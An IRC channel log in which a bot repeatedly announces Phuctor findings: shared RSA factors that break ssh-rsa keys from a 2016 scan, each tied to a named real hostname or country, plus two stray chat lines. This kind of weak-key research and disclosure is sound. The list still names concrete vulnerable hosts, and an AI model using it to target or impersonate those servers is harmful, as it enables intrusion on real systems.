1804990;1524547046;deedbot;http://phuctor.nosuchlabs.com/gpgkey/6838D1B4096EE3FFD62580E7F8F2DFFEAC7B4AD962EA293A2D1E34921A8ED3BF << Recent Phuctorings. - Phuctored: 2554...5839 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-145-19-202.cust.vodafonedsl.it. IT) 1804991;1524547046;deedbot;http://phuctor.nosuchlabs.com/gpgkey/103AEC2DB4E666A22A935CB0705A2DFBC2D21E4ECB7C5285FD512FADFE3E5DC2 << Recent Phuctorings. - Phuctored: 2107...1607 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (5626.ovz-ssd8.hc.ru. RU) 1804992;1524547046;deedbot;http://phuctor.nosuchlabs.com/gpgkey/6EE7B13E060CF82A9C48A50B4BDD8AFC0ADB8FADCC588CE01978A65768FD58B4 << Recent Phuctorings. - Phuctored: 2163...9329 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE) 1804993;1524547046;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DECBEE266F6E46C73F4B232AAD7F8E2F8DA124EB75828ED85DBCD2782E174713 << Recent Phuctorings. - Phuctored: 2176...2339 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (notes.magma.ca. CA ON) 1804994;1524547046;deedbot;http://phuctor.nosuchlabs.com/gpgkey/31A6D08D30ED3D5B2861529EFD54337047D36FBB5AABB19BB8F3B9B8532879BA << Recent Phuctorings. - Phuctored: 2983...0593 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown UY MO) 1804995;1524547047;deedbot;http://phuctor.nosuchlabs.com/gpgkey/AAA75BD8365855ACD530BE6BB9733984C114244461C14704A1DBD8F976586E15 << Recent Phuctorings. - Phuctored: 2744...4637 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown ZA) 1804996;1524547047;deedbot;http://phuctor.nosuchlabs.com/gpgkey/45E4A3D82B00CD7ABE8C7B8A8D4D7059537E8FA49B3C32412717747121DC260A << Recent Phuctorings. - Phuctored: 2393...7257 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (serverort.ortansacom.ro. RO CJ) 1804997;1524547048;deedbot;http://phuctor.nosuchlabs.com/gpgkey/AEB2B693C0C6153D7B230EE34B41160C02C494BBE81FC7B6A54891B785E239A3 << Recent Phuctorings. - Phuctored: 2436...4381 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (h- DE) 1804998;1524547048;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C7CC7476181EEB85205FED09054A860B0617AD276BE5AA23B4C6090B6D3116DC << Recent Phuctorings. - Phuctored: 2388...0909 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US NC) 1804999;1524547049;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3B132968DD490F759A809E3ECBD84553C7E118A76E847E272AD9F70C15FC08D9 << Recent Phuctorings. - Phuctored: 2456...0843 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (xvm-8-194.ghst.net. FR) 1805000;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/760298FF0A13A2070CBED986883A34E1C3B9A98B92808ACD570BD734A1011D70 << Recent Phuctorings. - Phuctored: 2520...4311 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US IL) 1805001;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/CC736C0EBC5328001F9CAFDF4456D0B017B792FC6D375C6890F988B38752FBAD << Recent Phuctorings. - Phuctored: 2520...4311 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US) 1805002;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/BFFF4863806D1EFDEF15D8CABB28974C13DA4E3C20ECA064A81DC56D3EF48BAE << Recent Phuctorings. - Phuctored: 2704...6003 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (gw-3.iprs.de. DE NW) 1805003;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/5F6FA9E5C025DD2511B71EE2096076912B18B7A5CFA72C707F29100323A3BECF << Recent Phuctorings. - Phuctored: 2704...6003 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE NW) 1805004;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8E824BD58345BADC3DA1EC6CF5C3BD8C96D6A8DEEAC1019AE5C5CE5D2C7A1F0B << Recent Phuctorings. - Phuctored: 2709...9017 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (gnb122.internetdsl.tpnet.pl. PL) 1805005;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/A922DD117C7DBCEA3AFB8DF5085F0A18C37B6C58FA2BA5D6B2A4D56DF0370AED << Recent Phuctorings. - Phuctored: 2982...6909 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (cm-58-10-74-183.revip7.asianet.co.th. TH 10) 1805006;1524547628;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4DCA64429E4FEB1092FB49529CADCAFD7F98F59B987C97324F2CAC0F1DF0DE27 << Recent Phuctorings. - Phuctored: 2299...8073 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (cm-114-109-150-46.revip13.asianet.co.th. TH 57) 1805007;1524547629;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3EB8F1A141C3D2BC8A8A5AFBE8E296A871AE757B4F652C000F52C629B2EEEFDF << Recent Phuctorings. - Phuctored: 2932...8027 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (124.subnet110-139-71.speedy.telkom.net.id. ID) 1805008;1524547629;deedbot;http://phuctor.nosuchlabs.com/gpgkey/121F12879B4C8F09CB23FECFF93DCF183A83F2C5F51D2A841442F3066B30C343 << Recent Phuctorings. - Phuctored: 2328...6981 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (het27.physics.ntua.gr. GR I) 1805009;1524547630;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F1A66991BABB540616E4D540EC4EE6E3506EA4A0B2FB2C56BAED3C71F225340F << Recent Phuctorings. - Phuctored: 2081...9163 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (zope3.bugsys.de. DE NW) 1805010;1524547630;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3B41E097504063681E56B9DAF4F33E01A8FCCE69C01087BBEA25C59147747F65 << Recent Phuctorings. - Phuctored: 2081...9163 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (zope2.bugsys.de. DE NW) 1805011;1524547631;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8E67DDE3533500E77FA8C51E6EB3C38801B39136B0AE3979A2EB5F7301754F32 << Recent Phuctorings. - Phuctored: 2081...9163 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (zope4.bugsys.de. DE NW) 1805012;1524547631;deedbot;http://phuctor.nosuchlabs.com/gpgkey/5123A750E7EB3C5AA409ED550A847E392FA6FA40F440E88D3DFB6DD98F63EAE7 << Recent Phuctorings. - Phuctored: 2488...9521 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mvx-179-191-83-166.mundivox.com. BR) 1805013;1524547632;deedbot;http://phuctor.nosuchlabs.com/gpgkey/BDB1AD1D057B2DC54D6CC0707A297B21FC8FF7F6F7E09C229662EE3AA60EAA55 << Recent Phuctorings. - Phuctored: 2965...0951 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown JP) 1805014;1524547895;mircea_popescu;so i close the whore programme just in time for asciilifeform to open the ai programme... 1805015;1524547900;mircea_popescu;will the logs never cease 1805016;1524548158;deedbot;http://phuctor.nosuchlabs.com/gpgkey/15F4FA38A9D548A96D3C479721A62823BC7C76EC8C0B0E6DA74E3BD0E36EBC4D << Recent Phuctorings. - Phuctored: 2719...1751 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown TR) 1805017;1524548158;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DDFBA7D71CBDF37C6F1867C956C5B9ED90D75C7BCE5AAD6F5FDC1A88C4D43F31 << Recent Phuctorings. - Phuctored: 2248...4929 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown CO DC) 1805018;1524548158;deedbot;http://phuctor.nosuchlabs.com/gpgkey/9AC66FE01294598AD49CDB0FCE12320B7802ACCAD8AA3A5DDA84BDB71D28DDB0 << Recent Phuctorings. - Phuctored: 2768...7791 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE) 1805019;1524548158;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DA0891B9F88CBEE4948DE754F1008055823CBC66D80CFBFF8FE2EEBDDB071B09 << Recent Phuctorings. - Phuctored: 2746...9761 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (host- FI) 1805020;1524548158;deedbot;http://phuctor.nosuchlabs.com/gpgkey/E7D08D9291C03DD5508A81CE5EA3C9202AECB6A1FB04CC1D9E85284AC569D6FD << Recent Phuctorings. - Phuctored: 2316...0431 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (216-194-127-233.c7dc.com. US UT) 1805021;1524548159;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3A50C32560864AE1C6AF826EB87E6783F2BA6C9CF5833ADFE337BC806FDCDC26 << Recent Phuctorings. - Phuctored: 2316...0431 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (216-194-127-250.c7dc.com. US UT) 1805022;1524548159;deedbot;http://phuctor.nosuchlabs.com/gpgkey/79292880A023AF62C1906B11AD4CE6C9D03A39A9BC9DEEAD84601F11E5D64736 << Recent Phuctorings. - Phuctored: 2316...0431 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (216-194-127-238.c7dc.com. US UT) 1805023;1524548160;deedbot;http://phuctor.nosuchlabs.com/gpgkey/AD82CE9418960169EA33E219FA3E009C42AE3CCD6E415148FFA2CCAA3E54F4C8 << Recent Phuctorings. - Phuctored: 2316...0431 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (littleblue.rockpenguin.com. US UT) 1805024;1524548160;deedbot;http://phuctor.nosuchlabs.com/gpgkey/59B55EC607F6201FBB186AEED85EBD07449F7C3FE13683C36E06F23343B02BB0 << Recent Phuctorings. - Phuctored: 2353...2953 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown RU TOM) 1805025;1524548161;deedbot;http://phuctor.nosuchlabs.com/gpgkey/1930A4D9626A145B7F336D7A661C4C6F70EACCC0CB9AA9933EFFE6C6CDD55152 << Recent Phuctorings. - Phuctored: 2353...2953 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US CA) 1805026;1524548161;deedbot;http://phuctor.nosuchlabs.com/gpgkey/6FCA2E6AEDD3C38B3E8CBFED4BFDAE661540AA34F168B4E792B2EB3768C29FF0 << Recent Phuctorings. - Phuctored: 2291...8961 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown RU) 1805027;1524548162;deedbot;http://phuctor.nosuchlabs.com/gpgkey/89F2BE8C94DAD5488600E218B2222796FDD09E4DCBE514B8950303B881F296E7 << Recent Phuctorings. - Phuctored: 2282...9399 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' ( ES B CT) 1805028;1524548162;deedbot;http://phuctor.nosuchlabs.com/gpgkey/EFAFB85701A25A49224A7502AB4B175429977E25D898BE694AFC2FC0573F127A << Recent Phuctorings. - Phuctored: 2466...5401 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US IL) 1805029;1524548163;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3BBD8FF209786D03FDE90EF4FDF81AA49EC013F11715FE31332CE5A7023B2F95 << Recent Phuctorings. - Phuctored: 2329...9829 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE NW) 1805030;1524549189;deedbot;http://phuctor.nosuchlabs.com/gpgkey/45BA2F9FD388D62850F109C2B0E0975847D2513E096BB6D2CB3EF77F26EDBA75 << Recent Phuctorings. - Phuctored: 2458...3873 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (merganser.math.gvsu.edu. US MI) 1805031;1524549189;deedbot;http://phuctor.nosuchlabs.com/gpgkey/AEACE7614AF094B4718546C300D2CD1E30CF52F0313D1A082D7B3B36F0E90BF7 << Recent Phuctorings. - Phuctored: 3004...7601 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (hmz26.internetdsl.tpnet.pl. PL MA) 1805032;1524549189;deedbot;http://phuctor.nosuchlabs.com/gpgkey/EA922C4231F27162C0AAEFE533A7543F56F959104E31050E35589D2F75920A4D << Recent Phuctorings. - Phuctored: 2112...6339 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (ip245.ip-198-100-150.net. CA QC) 1805033;1524549189;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4C069238F55B83EA0C0E4D794CEB2CEAC8CA65310C4307162E12EC92B1B50619 << Recent Phuctorings. - Phuctored: 2413...5243 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.gbapro.com.ar. AR C) 1805034;1524549189;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4EE75E097826B7B9FB32B855538F5F72BAF1EB27AB71A33E99FA90BF49C234E6 << Recent Phuctorings. - Phuctored: 2498...5313 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (192-41-45-207.c7dc.com. US UT) 1805035;1524549190;deedbot;http://phuctor.nosuchlabs.com/gpgkey/EA9E6FBE6DECCD8CF8EEFC7E2755C818EA33BB324FCD2E7CA09AC5830F56C984 << Recent Phuctorings. - Phuctored: 2544...9517 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (agb238.internetdsl.tpnet.pl. PL) 1805036;1524549190;deedbot;http://phuctor.nosuchlabs.com/gpgkey/BA1D302BCD63D62637051F30298CAA63ECF71967944C45B1B8E1ADF11E1CD02C << Recent Phuctorings. - Phuctored: 2544...9517 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (hizirold.xs4all.nl. NL ZH) 1805037;1524549191;deedbot;http://phuctor.nosuchlabs.com/gpgkey/21B739F7C403862A6D8DF2C430D8D14AB05D69CE518C011CCF56E3849B7FE059 << Recent Phuctorings. - Phuctored: 2783...1579 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (host10-99-static.46-88-b.business.telecomitalia.it. IT) 1805038;1524549191;deedbot;http://phuctor.nosuchlabs.com/gpgkey/7A7F0159B9AC8854971ACC383B3BD62CE7287412F06B4C72DB37F2C399F8757B << Recent Phuctorings. - Phuctored: 2578...2153 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' ( US IL) 1805039;1524549192;deedbot;http://phuctor.nosuchlabs.com/gpgkey/EFACCBC681630657AE49CCC3BB547FED0B30834120AE9308657CF71FD2C209B7 << Recent Phuctorings. - Phuctored: 2446...8153 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (62-99-140-14.static.upcbusiness.at. AT) 1805040;1524549192;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F003CED3DBDA3813927D37F4FACFEE2F40E91088E836DDE165E00D0D6392A096 << Recent Phuctorings. - Phuctored: 2446...8153 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.wiki.at. AT) 1805041;1524549193;deedbot;http://phuctor.nosuchlabs.com/gpgkey/B10F470B27847FDD92F48D76C4D9A79D29E03C224FC36430A19E7937AD0DCF31 << Recent Phuctorings. - Phuctored: 2651...7663 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (87-253-145-150.colo.transip.net. NL) 1805042;1524549738;deedbot;http://phuctor.nosuchlabs.com/gpgkey/69060F73477E457C8B532FE9D9B275520316B1C16DEBB3069B1081608DDE98A4 << Recent Phuctorings. - Phuctored: 2244...5239 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (radius-sci.campus.univ-poitiers.fr. FR 86 T) 1805043;1524549738;deedbot;http://phuctor.nosuchlabs.com/gpgkey/7FF10FFD5E7F7EE6C2497D20452061FB8713C20F904A7A86B21EE093A5E7D254 << Recent Phuctorings. - Phuctored: 2500...8359 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (a61.ip.network-consulting.fr. FR) 1805044;1524549738;deedbot;http://phuctor.nosuchlabs.com/gpgkey/64B6EAF797B208717F4341A4F1251FB212242560F4A4BAF5CC1FD6E6FFD673E6 << Recent Phuctorings. - Phuctored: 2026...9687 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (m18s17.vlinux.de. DE) 1805045;1524549738;deedbot;http://phuctor.nosuchlabs.com/gpgkey/37E55F78CD09C294726B2003B506E437A3B9724BC315401BE45EF25A410D9C68 << Recent Phuctorings. - Phuctored: 2606...8771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown HR) 1805046;1524549738;deedbot;http://phuctor.nosuchlabs.com/gpgkey/A8567569490690A4A212DEEDF7809300A0F133264CEB4ED07E15261F5F26C5E4 << Recent Phuctorings. - Phuctored: 2067...1921 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (blackbox.poly.edu. US NY) 1805047;1524549739;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C30AA4DAEC55910C94B5E32B7B847E3D84DA19A0160ACB16424A6913156B5CD4 << Recent Phuctorings. - Phuctored: 2171...7573 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (ip077244251098.rev.nessus.at. AT) 1805048;1524549739;deedbot;http://phuctor.nosuchlabs.com/gpgkey/1DD542B4BEF18F141C7B6941F77348DB7B711C2E59FD22B9BCF8389711074965 << Recent Phuctorings. - Phuctored: 2578...8113 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (exchange.piccollo.cz. CZ) 1805049;1524549740;deedbot;http://phuctor.nosuchlabs.com/gpgkey/A884F230768329AD945408D87431EADEEDE8302334631C7A6CA420D2F7246AD8 << Recent Phuctorings. - Phuctored: 3009...9701 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (du-62-240-240-106.adsl.claranet.fr. FR) 1805050;1524549740;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C4DD67FC9EF3F02C546F6370083482DEF57056DE36BE52EEB4795E37F9FA9154 << Recent Phuctorings. - Phuctored: 2636...1281 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (213-177-92-50.cybernet.be. BE) 1805051;1524549741;deedbot;http://phuctor.nosuchlabs.com/gpgkey/77A34DC35A2A9FD833BDA0FA0706E62E1F1A8BEBF088EBC18DB2D2A396E47103 << Recent Phuctorings. - Phuctored: 2762...2463 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' ( UA) 1805052;1524550274;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DEFC6FF1AC64CC8C373077F95ECA07184BB6F0E7C8119BE3F4E831257B572E3A << Recent Phuctorings. - Phuctored: 2257...9939 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown CL RM) 1805053;1524550274;deedbot;http://phuctor.nosuchlabs.com/gpgkey/EBBAEA2FCFBDA7A5185132DFE6933D5BC725DCFD9C7E73559592F5DA86110A78 << Recent Phuctorings. - Phuctored: 2257...9939 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (cm-staticIP-85-152-3-133.telecable.es. ES AS O) 1805054;1524550275;deedbot;http://phuctor.nosuchlabs.com/gpgkey/992A25CDB4B0088C43ADE9593FE0CBA651B73178EC6470CFEB53392634F38D79 << Recent Phuctorings. - Phuctored: 2257...9939 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown CL RM) 1805055;1524550275;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C0EEAC20CCB90C6BBD59D0E94E3ED84FA3406B0120B949CE8F012724967D2801 << Recent Phuctorings. - Phuctored: 2207...7661 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (www.cambam.co.uk. GB) 1805056;1524550275;deedbot;http://phuctor.nosuchlabs.com/gpgkey/0A3FBE456F09A2AD8A9D8A2145B6BF806A4CE8F238341E65BC44E328BDB2B371 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-2-32-77-211.cust.vodafonedsl.it. IT 75 BA) 1805057;1524550275;deedbot;http://phuctor.nosuchlabs.com/gpgkey/B04502A3B87438A8D6ACC60BE3FB766201302723F520FDDBAFF6ABCAE7FC9FC8 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-37-159-230-19.cust.vodafonedsl.it. IT) 1805058;1524550275;deedbot;http://phuctor.nosuchlabs.com/gpgkey/B02E748BEF5771EA97E7AF9E17640B5D412109B649EB7FC73DF5E01A41B546EB << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-145-33-31.cust.vodafonedsl.it. IT) 1805059;1524550276;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8A195961F70822A045134682B93D1E5AE1CB1F937A26AB57B546F5CFB81080F7 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-37-159-229-60.cust.vodafonedsl.it. IT) 1805060;1524550276;deedbot;http://phuctor.nosuchlabs.com/gpgkey/426F9CBDC3DD23AFAA65110CCBC6F33AC1AB810AB0BC33BDEC0F1D7962E277F6 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-37-182-224-100.cust.vodafonedsl.it. IT) 1805061;1524550277;deedbot;http://phuctor.nosuchlabs.com/gpgkey/FC8BBAF456EAF32E9297047B6C985352ED9ABB243B94DD2932954779E5056176 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-93-149-111-94.cust.vodafonedsl.it. IT) 1805062;1524550277;deedbot;http://phuctor.nosuchlabs.com/gpgkey/13FA1549E1D35BB883FB1F4EBD258CACC48629E138B1D5709207C12D02398E75 << Recent Phuctorings. - Phuctored: 2528...1771 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (net-188-219-253-186.cust.vodafonedsl.it. IT SP 42) 